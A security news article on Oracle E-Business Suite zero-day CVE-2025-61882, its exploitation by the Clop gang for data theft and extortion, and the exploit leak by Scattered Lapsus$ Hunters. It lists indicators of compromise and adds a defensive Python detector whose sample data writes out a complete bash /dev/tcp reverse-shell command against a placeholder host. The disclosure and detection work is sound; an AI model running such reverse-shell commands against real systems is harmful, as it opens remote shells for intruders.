Oracle Fixes Zero-Day Exploited in Clop Ransomware Attacks

Summary

Oracle has disclosed a critical zero-day vulnerability (CVE-2025-61882) in its E-Business Suite, enabling unauthenticated remote code execution and actively exploited in Clop ransomware data theft attacks.
– The flaw affects Oracle E-Business Suite versions 12.2.3-12.2.14, has a CVSS score of 9.8, and Oracle has released an emergency security update requiring prior installation of the October 2023 Critical Patch Update.
– The Clop ransomware gang exploited this vulnerability and others to steal data from Oracle E-Business Suite servers in August 2025, demanding ransoms to prevent data leaks.
– Indicators of compromise for the zero-day include specific IP addresses, a reverse shell command, and exploit files, with a public proof-of-concept exploit leaked by the Scattered Lapsus$ Hunters threat actor group.
– The exploit’s source is linked to Scattered Lapsus$ Hunters, who leaked it on Telegram, raising questions about their connection to Clop, though ShinyHunters claims the exploit was stolen and shared without authorization.

Oracle has issued an urgent security alert concerning a critical zero-day vulnerability, identified as CVE-2025-61882, which enables unauthenticated remote code execution within its E-Business Suite. This flaw, actively exploited by the Clop ransomware group in widespread data theft campaigns, affects the Oracle Concurrent Processing component, specifically BI Publisher Integration. With a maximum severity CVSS score of 9.8, the vulnerability can be exploited over a network without requiring any username or password, posing a severe risk to affected systems.

The vulnerability impacts Oracle E-Business Suite versions 12.2.3 through 12.2.14. Oracle has released an emergency security update to mitigate the threat. However, the company specifies that customers must first install the October 2023 Critical Patch Update before applying this new patch. Given that a public proof-of-concept exploit is available and active attacks are underway, administrators are urged to implement the update immediately to protect their environments.

Although Oracle did not initially label this as a zero-day, the company has since published indicators of compromise that match an exploit recently shared by threat actors on Telegram. Charles Carmakal, CTO at Mandiant, confirmed that CVE-2025-61882, along with other vulnerabilities patched in July, was weaponized by the Clop ransomware gang during data theft operations targeting Oracle E-Business Suite servers in August 2025. Carmakal explained on LinkedIn that Clop leveraged multiple security gaps, including one patched just this past weekend, to exfiltrate substantial amounts of data from numerous victims.

Reports of Clop’s latest extortion campaign surfaced last week when Mandiant and the Google Threat Intelligence Group began tracking a wave of emails sent to multiple companies. These messages, purportedly from the threat actors, claimed that Clop had successfully breached Oracle E-Business Suite systems, stolen confidential documents, and were now demanding ransom payments to prevent public leakage of the data. One such email shared with BleepingComputer read, “We are CL0P team. If you haven’t heard about us, you can google about us on internet. We have recently breached your Oracle E-Business Suite application and copied a lot of documents. All the private files and other information are now held on our systems.”

Clop later confirmed to BleepingComputer that they were responsible for the extortion emails and indicated they had exploited a previously unknown Oracle vulnerability to carry out the data theft. The group stated, “Soon all will become obvious that Oracle bugged up their core product and once again, the task is on clop to save the day.” Initially, Oracle attributed the campaign to flaws patched in July 2025, but it is now clear the recently disclosed zero-day was instrumental in the attacks.

Oracle has shared specific indicators of compromise associated with the exploitation, including two IP addresses, 200.107.207.26 and 185.181.60.11, linked to observed malicious activity involving HTTP GET and POST requests. Additionally, a command used to open a reverse shell was identified: “sh -c /bin/bash -i >& /dev/tcp// 0>&1”. File hashes for the exploit archive and its components were also published, matching a proof-of-concept package leaked online.
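To turn the published indicators into something a defender can run, here is a small added example (not code from the article, Oracle, or BleepingComputer) that scans web-server access log lines for the two IP addresses quoted above and scans process command lines for the bash `/dev/tcp` reverse-shell shape. The access log format (Apache/NGINX "combined"), the request paths, the timestamps, and the reverse-shell host and port (`198.51.100.7:4444`, a TEST-NET documentation address) are all constructed for the example; only the two IPs and the command shape come from the article.

```python
import json
import re
from typing import Dict, Iterable, List, Optional

# IP addresses quoted in the article as Oracle's published indicators.
IOC_IPS = frozenset({"200.107.207.26", "185.181.60.11"})

# The published command has its host and port elided in the article, so this
# pattern matches the bash /dev/tcp redirection shape with any host/port
# (including the elided "/dev/tcp//" form).
REVERSE_SHELL_RE = re.compile(r"/bin/bash\s+-i\s+>&\s*/dev/tcp/\S*\s+0>&1")

# Assumption: logs are in Apache/NGINX combined format (client IP first).
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access-log lines (not real traffic); request paths are placeholders.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [05/Oct/2025:10:01:02 +0000] "GET /placeholder/login HTTP/1.1" 200 5120',
    '200.107.207.26 - - [05/Oct/2025:10:02:15 +0000] "GET /placeholder/endpoint HTTP/1.1" 200 1234',
    '185.181.60.11 - - [05/Oct/2025:10:02:40 +0000] "POST /placeholder/endpoint HTTP/1.1" 200 87',
    '10.0.0.9 - - [05/Oct/2025:10:03:00 +0000] "GET /placeholder/report HTTP/1.1" 200 2210',
    "garbage line that does not parse",
]

# Constructed sample process command lines, e.g. from `ps -eo args` or an EDR export.
SAMPLE_PROCESS_CMDLINES = [
    "/usr/bin/java -Xmx2g -jar app.jar",
    "sh -c /bin/bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",
    "sh -c ls -la /tmp",
]


def parse_combined_log_line(line: str) -> Optional[Dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = COMBINED_LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_ioc_ip_hits(lines: Iterable[str]) -> List[Dict]:
    """Return parsed records whose client IP is one of the published indicator IPs."""
    hits = []
    for line in lines:
        rec = parse_combined_log_line(line)
        if rec and rec["ip"] in IOC_IPS:
            hits.append(rec)
    return hits


def find_reverse_shell_cmdlines(cmdlines: Iterable[str]) -> List[str]:
    """Return command lines that match the bash /dev/tcp reverse-shell shape."""
    return [c for c in cmdlines if REVERSE_SHELL_RE.search(c)]


def summarize() -> Dict:
    """Run both checks over the constructed samples and return a compact report."""
    ip_hits = find_ioc_ip_hits(SAMPLE_ACCESS_LOG)
    shell_hits = find_reverse_shell_cmdlines(SAMPLE_PROCESS_CMDLINES)
    return {
        "ioc_ip_hits": [(h["ip"], h["method"], h["path"]) for h in ip_hits],
        "reverse_shell_hits": shell_hits,
    }


if __name__ == "__main__":
    print(json.dumps(summarize(), indent=2))
```

In practice you would feed `find_ioc_ip_hits` the real access logs of the EBS web tier and `find_reverse_shell_cmdlines` a process inventory or shell-history export; a hit on either check is a reason to pull the host for forensic review rather than proof on its own, since the IP list is small and the command pattern is generic.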

The zero-day exploit first came to light through a different threat actor collective calling themselves “Scattered Lapsus$ Hunters”. This group, which claims to include members from Scattered Spider, Lapsus$, and ShinyHunters, leaked two files on Telegram. One file, named “GIFTFROMCL0P.7z”, contained Oracle source code reportedly stolen during a February 2025 breach of Oracle Cloud. The other, an archive titled “ORACLEEBSNDAYEXPLOITPOCSCATTEREDLAPSUSRETARDCL0P_HUNTERS.zip”, was implied to be the actual exploit used by Clop.

BleepingComputer verified that this archive matches the one listed in Oracle’s indicators of compromise. The package includes a readme file and two Python scripts, exp.py and server.py, designed to exploit vulnerable Oracle E-Business Suite instances, enabling either arbitrary command execution or the establishment of a reverse shell connection to an attacker-controlled server. The appearance of this exploit in the wild raises questions about how Scattered Lapsus$ Hunters obtained it and whether they collaborate in any way with Clop.

ShinyHunters told BleepingComputer they believe an individual with whom they shared the exploit may have provided or sold it to Clop. They commented, “That was my exploit just like SAP, which was stolen by the CCP, and it upset me more that another one of my exploits was being exploited by another group in an unsuccessful way, so we leaked it. No hate to cl0p.” BleepingComputer reached out to Clop for clarification on this relationship but has not yet received a reply.

(Source: Bleeping Computer)
